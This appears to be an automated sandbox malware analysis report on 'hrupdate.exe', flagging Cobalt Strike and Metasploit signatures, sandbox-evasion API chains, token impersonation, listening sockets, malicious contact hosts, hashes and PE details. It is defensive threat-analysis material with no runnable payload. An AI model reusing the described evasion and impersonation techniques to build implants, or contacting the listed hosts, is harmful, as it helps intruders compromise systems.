      Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: classification engine Classification label: mal96.troj.evad.winEXE@1/0@2/1
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FC77F5 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_04FC77F5
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FCA1AE CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32First,Thread32Next,Sleep,0_2_04FCA1AE
      Source: C:\Users\user\Desktop\hrupdate.exe Command line argument: slv 0_2_00B01480
      Source: C:\Users\user\Desktop\hrupdate.exe Command line argument: SibcorUpdate 0_2_00B01480
      Source: C:\Users\user\Desktop\hrupdate.exe Command line argument: SIBCORUPDATE 0_2_00B01480
      Source: C:\Users\user\Desktop\hrupdate.exe Command line argument: @qv 0_2_00B01480
      Source: hrupdate.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\hrupdate.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\hrupdate.exe Section loaded: apphelp.dll, msvcp140.dll, vcruntime140.dll, sspicli.dll, mswsock.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, uxtheme.dll, textshaping.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, wininet.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, iertutil.dll, profapi.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: hrupdate.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb source: hrupdate.exe
      Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb%% source: hrupdate.exe
      Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FEECF7 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,FreeLibrary,0_2_04FEECF7
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B038D6 push ecx; ret 0_2_00B038E9
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FDD7C0 push eax; ret 0_2_04FDD7C7
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FE0BB1 push ecx; ret 0_2_04FE0BC4
      Source: C:\Users\user\Desktop\hrupdate.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
      Source: C:\Users\user\Desktop\hrupdate.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
      Source: C:\Users\user\Desktop\hrupdate.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FCBBF10_2_04FCBBF1
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FC6BE70_2_04FC6BE7
      Source: C:\Users\user\Desktop\hrupdate.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-18421
      Source: C:\Users\user\Desktop\hrupdate.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-16394
      Source: C:\Users\user\Desktop\hrupdate.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-16381
      Source: C:\Users\user\Desktop\hrupdate.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-16649
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FC6BE70_2_04FC6BE7
      Source: C:\Users\user\Desktop\hrupdate.exe TID: 7484 Thread sleep time: -120000s >= -30000s
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FCE544 _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_04FCE544
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FC8839 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_04FC8839
      Source: hrupdate.exe, 00000000.00000002.2942922670.000000000124E000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2166447850.000000000128F000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2236318352.000000000128F000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2325730281.000000000128E000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2303657563.000000000128E000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.2942922670.0000000001289000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2259042912.000000000128F000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2211659727.000000000128F000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2188630065.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\hrupdate.exeAPI call chain: ExitProcess graph end nodegraph_0-16650
      Source: C:\Users\user\Desktop\hrupdate.exeAPI call chain: ExitProcess graph end nodegraph_0-17021
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FDD81B LdrInitializeThunk,0_2_04FDD81B
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B0364F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B0364F
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FEECF7 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,FreeLibrary,0_2_04FEECF7
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030DCA68 mov eax, dword ptr fs:[00000030h]0_3_030DCA68
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030DBE95 mov eax, dword ptr fs:[00000030h]0_3_030DBE95
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FEEE9D VirtualQuery,GetModuleFileNameW,GetPdbDll,GetProcAddress,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,0_2_04FEEE9D
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B03084 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B03084
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B0364F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B0364F
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B037E2 SetUnhandledExceptionFilter,0_2_00B037E2
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FE1CCF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04FE1CCF
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FE555E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04FE555E
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FD33CB LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_04FD33CB
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FD359B GetCurrentProcessId,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_04FD359B
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B0390E cpuid 0_2_00B0390E
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: GetLocaleInfoA,0_2_04FEB0B0
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FC78A5 CreateNamedPipeA,0_2_04FC78A5
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B0353E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B0353E
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B01480 WSAStartup,GetUserNameW,wcstombs_s,memset,strncat,WSACleanup,LoadStringW,LoadStringW,LoadStringW,LoadIconW,LoadIconW,LoadCursorW,LoadIconW,RegisterClassExW,CreateWindowExW,UpdateWindow,LoadIconW,lstrcpyW,Shell_NotifyIconW,LoadAcceleratorsW,GetMessageW,GetMessageW,DialogBoxParamW,TranslateAcceleratorW,TranslateMessage,DispatchMessageW,GetMessageW,terminate,0_2_00B01480
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FCBCA3 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,0_2_04FCBCA3
      Source: C:\Users\user\Desktop\hrupdate.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Remote Access Functionality

Source: Yara match, File source: Process Memory Space: hrupdate.exe PID: 7428, type: MEMORYSTR
Source: C:\Users\user\Desktop\hrupdate.exe, Code function: 0_2_04FCC481 htonl, htons, socket, closesocket, bind, ioctlsocket, 0_2_04FCC481
Source: C:\Users\user\Desktop\hrupdate.exe, Code function: 0_2_04FD3FA4 socket, closesocket, htons, bind, listen, 0_2_04FD3FA4
Source: C:\Users\user\Desktop\hrupdate.exe, Code function: 0_2_04FCC39F socket, htons, ioctlsocket, closesocket, bind, listen, 0_2_04FCC39F
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity InformationAcquire Infrastructure2
      Valid Accounts
      2
      Command and Scripting Interpreter
      2
      Valid Accounts
      2
      Valid Accounts
      2
      Valid Accounts
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      21
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts3
      Native API
      1
      DLL Side-Loading
      21
      Access Token Manipulation
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Query Registry
      Remote Desktop ProtocolData from Removable Media4
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Process Injection
      21
      Access Token Manipulation
      Security Account Manager131
      Security Software Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading
      1
      Process Injection
      NTDS1
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput Capture114
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets1
      Process Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials1
      Account Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      System Owner/User Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
      File and Directory Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow24
      System Information Discovery
      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Source | Detection | Scanner | Label | Link
hrupdate.exe | 3% | ReversingLabs | |
hrupdate.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | 3.79.209.76 | true | true | | unknown
www.hrtraining.ro | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
www.hrtraining.ro | true | | unknown
https://www.flntp.ro/rss/portallogin-gettask.html | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
3.79.209.76 | ec2-3-79-209-76.eu-central-1.compute.amazonaws.com | United States | | 16509 | AMAZON-02US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578569
Start date and time: 2024-12-19 22:39:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: hrupdate.exe
Detection: MAL
Classification: mal96.troj.evad.winEXE@1/0@2/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 31
• Number of non-executed functions: 82
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: hrupdate.exe
Time | Type | Description
16:40:03 | API Interceptor | 54x Sleep call for process: hrupdate.exe modified
21:39:53 | Task Scheduler | Run new task: {166D16CE-8744-4823-815F-D360B45E3A5C} path:
                                                              No context
                                                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 4.407559158089781
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: hrupdate.exe
File size: 244'224 bytes
MD5: 03b14e9338a1c9e5551f9450207f6d84
SHA1: f1a816c47637c8d4d0b52b333cba11b0d7571fcb
SHA256: 7a4d2b3e83220df7a55944a838bb9ebaa8f8463cff62fa92ae10e640eeb4e498
SHA512: 2c51fc5272e24ef43d770c7a6ac30252bcd408878405d2f1cf63327a05e497fd6e5fabc54a328ece7c4abe2ee4b1fcd8e9c03cb03bd6d5f0b2d7d6c87848b946
SSDEEP: 1536:MUth9KcBb/v5D8gCHqoPXDO4YcPJnWQyz9999Uh:MUtXNVD8gCPD3L
TLSH: 0C343B43569D7C92CC3C1B38237B97DB832EBE7578C5E08EB9803E9692BD0923512795
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<...].V.].V.].V.%$V.].V.5.W.].V.5.W.].V.5.W.].V.5.W.].V...W.].V.].V:].V$4.W.].V$4HV.].V.] V.].V$4.W.].VRich.].V........PE..L..
Icon Hash: 17170f6d2b2d2d13
Entrypoint: 0x40307a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x672B2266 [Wed Nov 6 08:01:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 40fa9cd20812bab5129ef85091bfbdac
                                                              Instruction
                                                              call 00007FDB744FB601h
                                                              jmp 00007FDB744FAF6Fh
                                                              push ebp
                                                              mov ebp, esp
                                                              push 00000000h
                                                              call dword ptr [00404038h]
                                                              push dword ptr [ebp+08h]
                                                              call dword ptr [0040406Ch]
                                                              push C0000409h
                                                              call dword ptr [00404034h]
                                                              push eax
                                                              call dword ptr [0040403Ch]
                                                              pop ebp
                                                              ret
                                                              push ebp
                                                              mov ebp, esp
                                                              sub esp, 00000324h
                                                              push 00000017h
                                                              call 00007FDB744FBBAAh
                                                              test eax, eax
                                                              je 00007FDB744FB0F7h
                                                              push 00000002h
                                                              pop ecx
                                                              int 29h
                                                              mov dword ptr [00406330h], eax
                                                              mov dword ptr [0040632Ch], ecx
                                                              mov dword ptr [00406328h], edx
                                                              mov dword ptr [00406324h], ebx
                                                              mov dword ptr [00406320h], esi
                                                              mov dword ptr [0040631Ch], edi
                                                              mov word ptr [00406348h], ss
                                                              mov word ptr [0040633Ch], cs
                                                              mov word ptr [00406318h], ds
                                                              mov word ptr [00406314h], es
                                                              mov word ptr [00406310h], fs
                                                              mov word ptr [0040630Ch], gs
                                                              pushfd
                                                              pop dword ptr [00406340h]
                                                              mov eax, dword ptr [ebp+00h]
                                                              mov dword ptr [00406334h], eax
                                                              mov eax, dword ptr [ebp+04h]
                                                              mov dword ptr [00406338h], eax
                                                              lea eax, dword ptr [ebp+08h]
                                                              mov dword ptr [00406344h], eax
                                                              mov eax, dword ptr [ebp-00000324h]
                                                              mov dword ptr [00406280h], 00010001h
                                                              Programming Language:
                                                              • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4d0c | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7000 | 0x361b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3e000 | 0x400 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x4450 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x44c0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4000 | 0x230 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
